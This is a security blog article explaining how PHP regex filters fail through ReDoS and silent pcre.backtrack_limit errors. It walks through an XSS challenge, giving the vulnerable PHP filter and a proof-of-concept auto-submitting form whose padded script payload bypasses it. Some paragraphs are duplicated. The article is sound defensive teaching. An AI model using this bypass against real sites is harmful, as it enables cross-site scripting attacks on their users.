Bad Meets evil - PHP meets Regular Expressions
This article would briefly discuss the reason why Regular Expressions might not be suitable for filtersand how things could turn miserably bad when PHP comes is used with Regular Expressions. The post would then continue with the write-up of a relevant scenario based challenge, and finally will conclude with the author’s opinion on the topic.
Common pitfalls of Regular expressions
RegEx (Regular expressions) are commonly used for pattern matching, searching and replacing purposes; which are handy for string manipulation in different supported back-end programming languages. In reality, there are ton of filters [1] which heavily rely upon RegEx to filter out malicious inputs.
We have already witnessed [2] why RegEx might not be considered as a good idea. However, one might argue that it is the programmers' fault (or rather choice of options) - they do not consider all the possible test cases for an attack surface scenario. I simply couldn't disagree with this statement. In fact, the Microsoft's current XSS filter [3] is a good example of it. Following are some of the problems:
Problem#1: Under the hood for the first problem, the filter currently employs a very long RegEx, to which surprisingly, has no public bypasses available. But one should not forget it actually evolves from the previous vulnerable versions, and one really must have the patience to write such a tedious RegEx.
Problem#2: The second problem is that even with a functional RegEx, this entirely could lead to different vulnerabilities. Yes; I'm talking about ReDoS(Regular Expression Denial of Service), an attack which happens to be surfaced in bad constructed Regex wherein attackers could compromise the availability of the application with a specially crafted input.
In a long run, with the programmer’s perspective, it might be a bit tedious for developers to handle both functionality and security at one hand. Therefore, we conclude that RegEx (Regular Expressions) should be considered evil when being heavily used in filters.
We have already witnessed [2] why RegEx might not be considered as a good idea. However, one might argue that it is the programmers' fault (or rather choice of options) - they do not consider all the possible test cases for an attack surface scenario. I simply couldn't disagree with this statement. In fact, the Microsoft's current XSS filter [3] is a good example of it. Following are some of the problems:
Problem#1: Under the hood for the first problem, the filter currently employs a very long RegEx, to which surprisingly, has no public bypasses available. But one should not forget it actually evolves from the previous vulnerable versions, and one really must have the patience to write such a tedious RegEx.
Problem#2: The second problem is that even with a functional RegEx, this entirely could lead to different vulnerabilities. Yes; I'm talking about ReDoS(Regular Expression Denial of Service), an attack which happens to be surfaced in bad constructed Regex wherein attackers could compromise the availability of the application with a specially crafted input.
In a long run, with the programmer’s perspective, it might be a bit tedious for developers to handle both functionality and security at one hand. Therefore, we conclude that RegEx (Regular Expressions) should be considered evil when being heavily used in filters.
PHP + RegEx = ?
PHP itself is not bad, however when combined with regex becomes bad. Regarding RegEx, Most of the used RegEx functions (i.e. preg_*) in PHP are based upon the PCRE library. The engine itself is not only deficient in terms of performance, but it also opens to have a potential gateway to REDOS vulnerabilities.
As we can see from a REDOS issue in PHP's famous frame work Code Igniter [4], a non-harmful RegEx (e.g. `/[a-z]+=/`) can cause a serious performance damange. More importantly, there is a fatal design flaw. In order to prevent resource exhaustion, PHP is so smart that it provides an option called pcre.backtrack_limit. What it does is to limit the number of backtracks (backtrack is a common cause of ReDoS). But what if the number of backtracks reaches the limit? Well, it just doesn't care. In other words, it is possible to evade specific protections when the conditions are met.
As we can see from a REDOS issue in PHP's famous frame work Code Igniter [4], a non-harmful RegEx (e.g. `/[a-z]+=/`) can cause a serious performance damange. More importantly, there is a fatal design flaw. In order to prevent resource exhaustion, PHP is so smart that it provides an option called pcre.backtrack_limit. What it does is to limit the number of backtracks (backtrack is a common cause of ReDoS). But what if the number of backtracks reaches the limit? Well, it just doesn't care. In other words, it is possible to evade specific protections when the conditions are met.
The write-up
In order to demonstrate how serious the problem could be, I had ended up creating a mini XSS puzzle of the kcal.pw series. Here is the sample code for this puzzle:
$xss = $_POST['xss'];
if (preg_match('/<(?:\w+)\W+?[\w]/', $xss)) {
echo '<p>I don\'t think so</p>';
} else {
echo $xss;
}
Let’s take a look at the following RegEx and what see it does: ```/<(?:\w+)\W+?[\w]/```
It detects any presence of an open tag, followed by any potential attributes, separators and whatsoever. Although the RegEx looks specious, it is technically sufficient for preventing XSS in HTML context. If you look closely, you will find the RegEx utilizes non-greedy matching which requires backtracking. As mentioned before, PHP has a default backtrack limit (pcre.backtrack_limit, 100000). However, PHP favours "fail silently", which makes pcre_match simply returns false instead of throwing an exception when the input reaches the limit. As a result, submitting a long enough payload will bypass the filter.
Let’s try using the preg_match function to test the regular expression with a large number of A’s:
var_dump(preg_match('/<(?:\w+)\W+?[\w]/', '<a/'.str_repeat('\\', 1000000).'/a'))
The proof of concept is simple. It simulates the input being matched with the vulnerable RegEx (A being repeated 1000000 times). And it does return false.
Proof Of Concept
<form action="http://s30003-101809-vkp.tarentum.hack.me/index.php" method="post">
<textarea style="display: none" name="xss"></textarea>
</form>
<script>
document.forms[0].xss.value = '<script' + Array(999999).join('/') + '>alert(1)<\/script>';
document.forms[0].submit();
</script>
Conclusion
The suggestion for the defense is to use RegEx only if absolute necessary. More importantly, avoid writing bad RegEx. Although there are some tools which claim to analyze potential ReDoS problem, the best practice is to again to substantially limit the use of RegEx. Finally, this is a take-away (which is also my “right” rule thumb principle):
If a filter relies too heavily on a Regex, then it might probably fail its job in terms of security!
About The Author
This article has been written by "File Descriptor", he prefers to be called as an "XSS Jigsaw" instead of his real name, which he prefers to keep secret. FD has decided to dedicate his life towards creating and solving XSS challenges and that is what in my opinion a hacker really is, a problem solving expert. You can follow him at @filedescriptor
References
1. http://www.thespanner.co.uk/2014/10/24/unbreakable-filter/
2. http://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags
3. http://www.cloudscan.me/2011/09/mshtmldll-ie-xss-filter-evasion.html
4. https://github.com/bcit-ci/CodeIgniter/issues/3123